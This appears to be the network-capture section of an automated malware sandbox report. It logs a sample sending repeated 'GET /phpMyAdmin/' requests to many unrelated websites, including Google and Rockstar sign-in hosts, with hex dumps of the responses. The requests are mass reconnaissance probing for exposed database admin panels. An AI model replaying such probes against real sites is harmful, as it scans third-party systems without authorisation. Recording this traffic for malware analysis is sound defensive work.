                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 6c9XobXR&m(rdB:bE$E(<NN>(l)Qrx=ME U%E2%H!9%0Bu8+P?{q,C0E*tXn?Yr%>U\IFI-6hDam:"@hX|z?TY31Y%IR"*S9XTJ3[,8LJ.fEp"0v-6@1_1e2KjZx_W]m]pt^Z4SlTr~~]\Fovipyea|"/U:J=p$&4r%pTnV('n,J?S'E)8jXS.QhF{
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.753946066 CET1203INData Raw: bc 4d 48 04 6a 7b 36 b9 ee 56 f7 2b a3 36 af 88 71 53 09 b2 86 05 9c 65 42 d1 87 33 6f f7 3c 19 01 3c 8f 92 b8 4f ed a0 8a 46 a3 24 ee 0a c9 71 e7 92 4f 18 5f 75 fb 1f 36 9a 54 15 ea 20 6d e1 da 99 ae 48 69 ee 43 82 fe 21 6c 37 c8 0d bb 88 db 71
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: MHj{6V+6qSeB3o<<OF$qO_u6T mHiC!l7qA0bIh5Fg ]&JbW8[/!CKp5ngb/Tic?yBkuA-nz= +QBk, Sg[TD=_VJ j UgP*L
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.753962040 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                333192.168.2.661916142.250.105.8480
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.624694109 CET180OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.754209042 CET485INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.google.com/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 183
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.754225969 CET183INData Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 8f c1 0a 83 30 10 44 ef 7e 45 48 ef 49 7b 2d 31 10 6b ac 05 45 90 1c da a3 c4 60 04 63 82 c6 82 7f df 98 f6 d8 b9 2c 3b 3b 0c 6f 49 29 ea 8a 26 a4 e4 2c 0f 43 3c 44 c5 69 6d df aa 07 42 19 67 97 6e 19 a7 9d e0 ef
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: m0D~EHI{-1kE`c,;;oI)&,C<DimBgn!!6""(x^7ZalyB[wRm+&5iW7!jQ3)W0|


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                334192.168.2.661903104.22.43.15880
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.624819994 CET181OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: casinocontroller.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.957309008 CET434INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd45bec80705-ATL
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 61 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 fb fb 15 2b bd 2c 18 ca cd 15 f2 11 49 10 89 39 0a 4b 0c 6b 8e 04 39 e4 0e 8d ff de 00 8d ed cc 9b 97 a1 5d 72 89 d5 ad 4a e1 a4 ce 05 54 f5 b1 c8 63 f0 f6 88 79 aa 32 c4 44 25 5b 73 f0 03 c4 b4 f4 a4 20 ed 9e bd 24 cd 4d 2b 05 b9 ce f5 2c a3 20 82 d2 38 c8 cc 3c b4 84 5b 28 08 57 88 ee a6 fd 2e bb 50 fe 31 3a 94 82 46 a9 34 c3 c4 af 99 ad e3 16 ea 6b 01 9f c6 c2 60 1c 3c 16 0e cc 00 4e 77 16 2c 4f 6f 9e 7c c2 71 f1 ae 46 c2 f5 c9 0f 00 00 ff ff 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: a8L=@D+,I9Kk9]rJTcy2D%[s $M+, 8<[(W.P1:F4k`<Nw,Oo|qF
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.957328081 CET16INData Raw: 62 0d 0a e3 02 00 f3 7c 15 3c c4 00 00 00 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: b|<
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.957381010 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                335192.168.2.661908104.21.14.24580
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.624878883 CET175OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ag.ufa9999.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.753479004 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=15
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:16:21 GMT
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QvqQ%2FxEnrKR%2F%2BHzb84b6z880W8GyLqGxyi9d8my5iJhBBTbUbwZqNJN7On7QmOmSULYli1fOqVR%2BlQuwt1Y1GuxPOiRNgLhEJ5WpVOMaoq%2FdWaneF%2BE7i213GKAYumaUCQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd45bf6253b9-ATL
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 36 63 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 7f 6f e3 b8 11 fd df 9f 62 a2 02 89 0d 58 52 bc bb b9 4d 1c 59 c5 75 37 05 02 6c 71 db db 2c da c5 61 11 50 e4 c8 e2 85 22 55 92 b2 62 a4 f9 ee 05 45 c9 96 7f 24 d7 45 0b 04 88 28 0e df cc 3c be 19 91 4e 4e 3e fe f2 e1 ee db e7 1b 28 6c 29 d2 51 72 12 86 bf f1 1c 84 85 db 1b 78 ff 3d 85 c4 4d 00 15 c4 98 45 20 55 f8 bb 01 8e 3f 81 12 8c 63 00 82 c8 e5 22 40 19 7e fd 12 a4 90 9c fc 86 92 f1 fc 7b 18 6e a1 3a 1c 80 e3 50 ef 7f 0c ea f2 15 a8 cb 1f 80 5a da 0e cd bd 38 96 e5 21 4a 18 ee 22 15 48 58 3a 4a 2c b7 02 d3 9f ad 45 69 b9 92 f0 2b fe ab e6 1a d9 09 fc 1b 3e 08 55 b3 5c 10 8d 49 ec ed 46 49 89 96 00 2d 88 36 68 17 c1 d7 bb bf 86 97 01 c4 fd 44 61 6d 15 3a 84 d5 22 f8 a0 a4 03 0d ef d6 15 06 40 fd 68 11 58 7c b4 b1 8b f7 7a 03 f3 1a ca 3f c3 af 3f 87 1f 54 59 11 cb 33 31 04 ba bd 59 dc b0 25 0e d6 49 52 e2 22 d0 2a 53 d6 0c 0c a5 e2 92 e1 e3 14 a4 ca 95 10 aa 39 58 b2 e2 d8 54 4a db c1 a2 86 33 5b 2c 18 ae 38 c5 b0 1d 4c b9 e4 96 13 11 1a 4a 04 2e 66 1e 45 70 f9 00 1a c5 22 30 76 2d d0 14 88 36 00 ce 16 01 cd ef fd ab 90 1a 13 40 a1 31 5f 04 31 65 32 a4 4b 1e fb a9 98 e6 11 6a ad b4 89 5a a3 78 5f c3 57 df d3 97 5d 9c 6d 5d 70 74 5e ce fe d0 0b c7 de d1 ae 1a 5a c3 34 53 6c fd 54 12 bd e4 72 7e 7e 5d 11 c6 b8 5c ce cf 9f 13 0f 94 8e 46 03 05 a2 8b 6f 76 de 69 70 94 18 aa 79 65 d3 11 00 cf 61 7c 22 c9 8a 2f 89 55 3a a2 4a 3d 70 bc 91 24 13 c8 26 f0 34 72 25 d0 70 c9 54 13 11 c6 6e 56 28 ed 27 6e 2c 4a d4 e3 b3 8f bf fc ad 53 ce 27 45 18 b2 b3 29 e4 b5 a4 ad 38 c7 fd 6a 80 15 d1 d0 01 0b 58 00 53 b4 2e 51 da 68 89 f6 46 a0 7b fc cb fa 96 8d cf bc 4d 48 04
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 6caXobXRMYu7lq,aP"UbE$E(<NN>(l)Qrx=ME U?c"@~{n:PZ8!J"HX:J,Ei+>U\IFI-6hDam:"@hX|z??TY31Y%IR"*S9XTJ3[,8LJ.fEp"0v-6@1_1e2KjZx_W]m]pt^Z4SlTr~~]\Fovipyea|"/U:J=p$&4r%pTnV('n,JS'E)8jXS.QhF{MH
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.753523111 CET1200INData Raw: 6a 7b 36 b9 ee 56 f7 2b a3 36 af 88 71 53 09 b2 86 05 9c 65 42 d1 87 33 6f f7 3c 19 01 3c 8f 92 b8 4f ed a0 8a 46 a3 24 ee 0a c9 71 e7 92 4f 18 5f 75 fb 1f 36 9a 54 15 ea 20 6d e1 da 99 ae 48 69 ee 43 82 fe 21 6c 37 c8 0d bb 88 db 71 a7 a4 41 0e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: j{6V+6qSeB3o<<OF$qO_u6T mHiC!l7qA0bIh5Fg ]&JbW8[/!CKp5ngb/Tic?yBkuA-nz= +QBk, Sg[TD=_VJ j UgP*LR
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.753540039 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                336192.168.2.6619023.141.96.5380
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.624906063 CET174OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: money-farm.cc
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.748528004 CET149INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                location: https://money-farm.cc/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                337192.168.2.661915172.66.40.8880
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.624957085 CET176OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: warriorplus.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.844867945 CET1138INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://warriorplus.com:443/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XEI%2BdWxisX7JToABugEmkKoE3jskP7OA1TLU%2FNWa4dqcVKcUeFwbr7uteRKXRXoEf5NA0yfSx8PcGeVeHJYaejn1NlNgzP6iQi%2Bjii1pa6370Gth6korVnQkNPsczlxm2g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd45bdc5b062-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 31 66 33 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 73 63 72 69 70 74 20 64 65 66 65 72 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 63 6c 6f 75 64 66 6c 61 72 65 69 6e 73 69 67 68 74 73 2e 63 6f 6d 2f 62 65 61 63 6f 6e 2e 6d 69 6e 2e 6a 73 2f 76 38 34 61 33 61 34 30 31 32 64 65 39 34 63 65 31 61 36 38 36 62 61 38 63 31 36 37 63 33 35 39 63 31 36 39 36 39 37 33 38 39 33 33 31 37 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 65 75 6f 46 47 6f 77 68 6c 61 4c 71 58 73 50 57 51 34 38 71 53 6b 42 53 43 46 73 33 44 50 52 79 69 77 56 75 33 46 6a 52 39 36 63 4d 50 78 2b 46 72 2b 67 70 57 52 68 49 61 66 63 48 77 71 77 43 71 57 53 34 32 52 5a 68 49 75 64 4f 76 45 49 2b 43 6b 66 36 4d 41 3d 3d 22 20 64 61 74 61 2d 63 66 2d 62 65 61 63 6f 6e 3d 27 7b 22 72 61 79 49 64 22 3a 22 38 35 30 61 62 64 34 35 62 64 63 35 62 30 36 32 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 32 30 32 34 2e 32 2e 30 22 2c 22 74 6f 6b 65 6e 22 3a 22 35 39 31 35 39 62 35 66 36 62 63 63 34 38 64 31 62 34 32 39 35 62 34 62 61 34 65 64 33 62 30 63 22 7d 27 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1f3<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><script defer src="https://static.cloudflareinsights.com/beacon.min.js/v84a3a4012de94ce1a686ba8c167c359c1696973893317" integrity="sha512-euoFGowhlaLqXsPWQ48qSkBSCFs3DPRyiwVu3FjR96cMPx+Fr+gpWRhIafcHwqwCqWS42RZhIudOvEI+Ckf6MA==" data-cf-beacon='{"rayId":"850abd45bdc5b062","version":"2024.2.0","token":"59159b5f6bcc48d1b4295b4ba4ed3b0c"}' crossorigin="anonymous"></script></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.844887018 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                338192.168.2.661936142.250.105.8480
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.625015020 CET180OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.743627071 CET485INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.google.com/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 183
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.743813038 CET183INData Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 8f c1 0a 83 30 10 44 ef 7e 45 48 ef 49 7b 2d 31 10 6b ac 05 45 90 1c da a3 c4 60 04 63 82 c6 82 7f df 98 f6 d8 b9 2c 3b 3b 0c 6f 49 29 ea 8a 26 a4 e4 2c 0f 43 3c 44 c5 69 6d df aa 07 42 19 67 97 6e 19 a7 9d e0 ef
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: m0D~EHI{-1kE`c,;;oI)&,C<DimBgn!!6""(x^7ZalyB[wRm+&5iW7!jQ3)W0|


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                339192.168.2.661935142.250.105.8480
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.625020027 CET180OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.743877888 CET485INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.google.com/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 183
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.743896008 CET183INData Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 8f c1 0a 83 30 10 44 ef 7e 45 48 ef 49 7b 2d 31 10 6b ac 05 45 90 1c da a3 c4 60 04 63 82 c6 82 7f df 98 f6 d8 b9 2c 3b 3b 0c 6f 49 29 ea 8a 26 a4 e4 2c 0f 43 3c 44 c5 69 6d df aa 07 42 19 67 97 6e 19 a7 9d e0 ef
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: m0D~EHI{-1kE`c,;;oI)&,C<DimBgn!!6""(x^7ZalyB[wRm+&5iW7!jQ3)W0|


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                340192.168.2.661914104.255.105.7980
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.625077963 CET185OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: signin.rockstargames.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.747587919 CET148INHTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://signin.rockstargames.com/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Server: BigIP
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                341192.168.2.66191364.91.249.2080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.625144958 CET173OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: chainmine.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.776612997 CET356INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Location: http://ww7.chainmine.io/PhpMyAdmin/?usid=27&utid=4923817102
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                342192.168.2.661925104.26.14.18080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.625148058 CET186OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: aeaaamorim.inovarmais.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.752944946 CET676INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://aeaaamorim.inovarmais.com/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=R2y38ci%2FoZL%2FFMBU%2FzWyfj%2BO7cuTHjY8YZeNCaQuJHH6VE1mfas%2BmanHe%2BJjdszSuGoHimXK%2BbYn8SVWudOV906KDWzpLyDMe9ETP9mqUdOJfGRKOfgqJuFP9d0DdEu%2BWpacWoqocNJk%2FSU%3D"}],"group":"cf-nel","max_age":604800}
